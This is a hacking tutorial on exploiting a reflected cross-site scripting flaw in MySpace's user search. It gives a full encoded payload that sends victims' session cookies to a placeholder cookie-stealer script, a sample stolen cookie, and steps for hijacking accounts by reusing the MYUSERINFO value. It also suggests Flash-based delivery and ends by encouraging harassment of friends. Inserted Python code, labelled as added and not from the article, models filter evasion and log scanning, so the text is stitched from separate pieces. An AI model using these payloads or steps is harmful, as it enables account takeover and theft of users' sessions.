XSS'ing MySpace.com

by FxYxIxE

So you've probably been on, have seen, or have your own part of the biggest trend of recent Internet times: MySpace.com.

It figures that a site this massive, running so many different kinds of web applications, would be vulnerable to multiple Cross-Site Scripting attacks.

If you're not familiar with Cross-Site Scripting (XSS or CSS, not to be confused with Cascading Style Sheets), or have forgotten about them, check out the Wikipedia entry about them.  Then meander on over to PacketStorm to get some examples on other sites to further understand the concept.

Basically what it enables one to do (in this case) is inject JavaScript into the URL of a site that uses a web application.

This means you can also put it directly into a clickable hyperlink.  The scope of this article will only cover using JavaScript (encoded) directly in the hyperlink to exploit the vulnerabilities.

There are other ways that could work very well without having to encode the JavaScript, such as ActionScript in Flash, which I will touch upon again later.

There are various different places in MySpace in which JavaScript can be injected.

For example, the "User Search" web application URL and things like that.  Most of them will need to be converted and encoded into hex or some other characters.  Usually not all of the JavaScript needs to be encoded, only the <script>-type tags.  This encoding enables one to bypass MySpace's filters, which attempt to prevent XSS.  The wonderful job that they do...

Let's move on to some examples and some explanations.

First of all, sign up for a MySpace account.  You will need it if you want this to work.  By the time this is published, this example may have already been fixed by MySpace.  I do not wish to guide any script kiddies step-by-step into this, so you will be forced to find your own XSS vulnerabilities by using the information shown below.  You could also use any method you prefer, possibly a vulnerability scanner.

Now here is the good stuff, the code, the implemented link, and the explanation of such.  The vulnerability lies within the "User Search" application (a.k.a. Browse):

http://searchresults.myspace.com/index.cfm?fuseaction=advancedFind.results&websearch=1&spotId=3&searchrequest=%22%3E%3Cscript%3Edocument%2Elocation='http://www.yourserver.com/cgi-local/cookiestealer.cgi%3F%20'%20%2Bdocument.cookie%3C/script%3E

As you can see from the link above, I have much of the link encoded in hex in order to evade MySpace's filters.

Below is the link without the encoding:

http://searchresults.myspace.com/index.cfm?fuseaction=advancedFind.results&websearch=1&spotId=3&searchrequest="><script>document.location='http://www.yourserver.com/cgi-local/cookiestealer.cgi? ' +document.cookie</script>

As you can see, the XSS actually starts right after the searchrequest= parameter.

The JavaScript is injected directly into the link.  It sets document.location to what is here just a placeholder test site: http://www.yourserver.com/cgi-local/cookiestealer.cgi

The current value of document.cookie is appended to that URL, so the CGI script receives it and writes it to the log file named within the CGI script.
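As an added illustration (not code from the article), here is a minimal Python model of one way a filter like the one described can be beaten by encoding: a blacklist that inspects the still-encoded parameter never sees the tag, while decoding first and HTML-escaping at the output point neutralises it whatever encoding was used.  How MySpace's filter actually worked is not stated in the article; the function names and the filter behaviour here are assumptions.

```python
import html
import re
from urllib.parse import unquote

# The encoded searchrequest value from the article, copied verbatim.
ENCODED_PAYLOAD = (
    "%22%3E%3Cscript%3Edocument%2Elocation="
    "'http://www.yourserver.com/cgi-local/cookiestealer.cgi%3F%20'"
    "%20%2Bdocument.cookie%3C/script%3E"
)

SCRIPT_TAG = re.compile(r"</?script[^>]*>", re.IGNORECASE)


def reflect_blacklist(raw_value: str) -> str:
    """Weak (assumed) filter: strip <script> tags from the still-encoded value,
    then decode and echo it into the page.  The decode step reintroduces the tag."""
    cleaned = SCRIPT_TAG.sub("", raw_value)
    return f"<p>Results for: {unquote(cleaned)}</p>"


def reflect_escaped(raw_value: str) -> str:
    """Hardened form: decode first, then HTML-escape at the output point so any
    tag characters render as text instead of markup."""
    decoded = unquote(raw_value)
    return f"<p>Results for: {html.escape(decoded, quote=True)}</p>"


def contains_script(markup: str) -> bool:
    """True if a live <script> element survived into the rendered output."""
    return SCRIPT_TAG.search(markup) is not None


if __name__ == "__main__":
    for name, fn in (("blacklist", reflect_blacklist), ("escaped", reflect_escaped)):
        out = fn(ENCODED_PAYLOAD)
        print(f"{name:9s} script tag present: {contains_script(out)}")
```

The blacklist does strip a plain, unencoded `<script>` tag, which is exactly why such a filter looks like it works until someone encodes the tag.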

Once you have successfully embedded your JavaScript and you have retrieved someone's cookie, open up the logger file you stated in the CGI script, and you will see something along the lines of the following.  They do vary from user to user, but you only need one part of it:

AGEFROM=16; AGETO=20; AREASEARCH=0; COLLAPSE=0; COUNTRY=US; DISTANCE=20; GENDER=W; NODETAIL=1; ORDERBY=3; PHOTOS=1; POSTAL=44130; STATUS=; AUTOSONGPLAY=0; MYSPACE=myspace; \
MSCOUNTRY=US; REVSCI=1; MYUSERINFO=MIHgBgorBEgEAYI3WAOxoTHRMIHOBgorBgGEEAYI3WAMBoIG/MIG8AGMCAAECAMYDAgIAWAQIR1uKtOZHL4MEETOKAKkZuvhepPPPHsFnig4kgZD4WwsnTYAIBTldoEtwRTERCWTNHR \
IEUZD00dt0q1g4XATMn3zjJ4LJmto9ZDDw5U3trmzU0pOvewnDjCZS0b325UH2VIVXiEONNTIX4+1L/aunAL3uiz/J45+7iWGoLjgu/1luaMZZ677zgiZ1/wuCtwV3CRDNS/VEFO+t+KVREQOMD7bb6hA37EDUSXdADxVITVSN64=; \
DERDB=ZG9tYWluPXlhaG9vInRsZD1jb20mc21va2VyPTAmc2V4CHI1Z7OxInV0eXB1PTEmcmVsaWwdpb5pZD0wInTI1Z21vbj0zOSZwbh3NO0VWxIb2RIPTOOMTMwiImlhcml0OYWxzdGFOdXM9UyZpbmNVvbwVpZD0xImhlawdodD0 \
xODAmZ2VuZGVyPU0mZnIpZwikez0wJmV0aGh5py2i1kPTgmYWdlPTE4ImJIvZHIOeXBI1aWwOIMIZjaGlsZHTlbmlkPTEmMV291lbnRyeT1VUyZkYXRpbmc9MCikcmlua2VvVyPTHMZWRIV2F0aWgwaWO9MO==; \
LASTUSERCLICK={ts '2005-12-20 00:49:13'}; FRNDIDxr2g=2721774

The section you are looking for in this is the MYUSERINFO portion, which in this case is:

MYUSERINFO=MIHgBgorBEgEAYI3WAOxoTHRMIHOBgorBgGEEAYI3WAMBoIG/MIG8AGMCAAECAMYDAgIAWAQIR1uKtOZHL4MEETOKAKkZuvhepPPPHsFnig4kgZD4WwsnTYAIBTldoEtwRTERCWTNHR \
IEUZD00dt0q1g4XATMn3zjJ4LJmto9ZDDw5U3trmzU0pOvewnDjCZS0b325UH2VIVXiEONNTIX4+1L/aunAL3uiz/J45+7iWGoLjgu/1luaMZZ677zgiZ1/wuCtwV3CRDNS/VEFO+t+KVREQOMD7bb6hA37EDUSXdADxVITVSN64=;

To test for your own XSS vulnerabilities in MySpace, you can use this simple example link to check whether your JavaScript executes (everything after the name= portion is the test):

http://www.vulnerablewebsite.com/users/search=12345&name=<script>alert("Hello!");</script>

If it worked, an alert box will pop up with your message of "Hello!" in it.
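From the defender's side, as an added example that is not part of the article: a small Python log scanner that percent-decodes each request's query string and flags the markers this kind of probe leaves behind (a script tag, document.cookie, document.location).  The log lines and field layout are constructed for the example; the first line reuses the article's encoded searchrequest value.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Common Log Format lines; the first carries the article's
# encoded searchrequest value, the last is a harmless search term.
SAMPLE_LOG = """\
203.0.113.5 - - [20/Dec/2005:00:49:13 -0500] "GET /index.cfm?fuseaction=advancedFind.results&websearch=1&spotId=3&searchrequest=%22%3E%3Cscript%3Edocument%2Elocation='http://www.yourserver.com/cgi-local/cookiestealer.cgi%3F%20'%20%2Bdocument.cookie%3C/script%3E HTTP/1.1" 200 5120
198.51.100.7 - - [20/Dec/2005:00:50:02 -0500] "GET /users/search?id=12345&name=%3Cscript%3Ealert(%22Hello!%22)%3B%3C/script%3E HTTP/1.1" 200 812
192.0.2.9 - - [20/Dec/2005:00:51:40 -0500] "GET /index.cfm?fuseaction=advancedFind.results&searchrequest=script+kiddies HTTP/1.1" 200 4096
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) \S+" \d{3}')

# Markers are matched against *decoded* parameter values, so percent-encoding
# (or double encoding) of the tag does not hide it from the scanner.
MARKERS = (
    re.compile(r"<\s*/?\s*script\b", re.IGNORECASE),
    re.compile(r"document\s*\.\s*(cookie|location)", re.IGNORECASE),
)


def suspicious_params(target: str) -> dict:
    """Return {parameter: decoded value} for query parameters hitting a marker."""
    hits = {}
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote(value)  # parse_qsl decoded once; this catches %25xx
        if any(m.search(decoded) for m in MARKERS):
            hits[key] = decoded
    return hits


def scan_log(text: str) -> list:
    """Return (client ip, parameter, decoded value) for every flagged request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for key, value in suspicious_params(m["target"]).items():
            findings.append((m["ip"], key, value))
    return findings


if __name__ == "__main__":
    for ip, key, value in scan_log(SAMPLE_LOG):
        print(f"{ip} {key}={value[:70]!r}")
```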

Now to move on to what you can do with this newfound cookie and information.

Note:  You will need to write your own CGI script that is used in the above example.  The script basically logs document.cookie to a log file.  You can easily find a tutorial or even a completed one using Google.

Hopefully by now you can tell what you can do with such a vulnerability, but if you cannot here's the brunt of it.  You probably noticed my JavaScript was telling an off-site CGI script to retrieve document.cookie.

With someone else's current session cookie from MySpace, you could effectively hijack their MySpace account and session.  With IE, Mozilla, or any browser you prefer (that has the correct plug-ins), you can copy the user's MYUSERINFO portion of their cookie into your current cookie.

After you do this, all you have to do is refresh the home page of your current MySpace account, and voilà, you are logged in as the user.  Note that the user must be online in order for you to log in as them, unless you capture the cookie and set it to never expire, and have the means to implement that.

With the link you generated using JavaScript and the MySpace XSS vulnerable web application, you can now send it to your friends (or enemies) and if they're online and gullible enough (try a Bulletin), you can instantly watch their cookie appear in your cookie log file, and then proceed to log in as them.

As stated before, there are ways to get the link and JavaScript to execute without the user doing more than visiting a page on MySpace they would normally visit, such as their front page, a private message, or your MySpace page.  This is accomplished by embedding the "evil" JavaScript and XSS info into a Flash document containing ActionScript.  MySpace only blocks the <embed> tag on certain parts of its site.

Note that the cookie you have just stolen also contains the user's password.  It is encrypted... so you really got more than just their session.  That is if you know what to do with it.  But that is an entire article in itself...

Now go have some fun posting obscene pictures on your friends' MySpace.
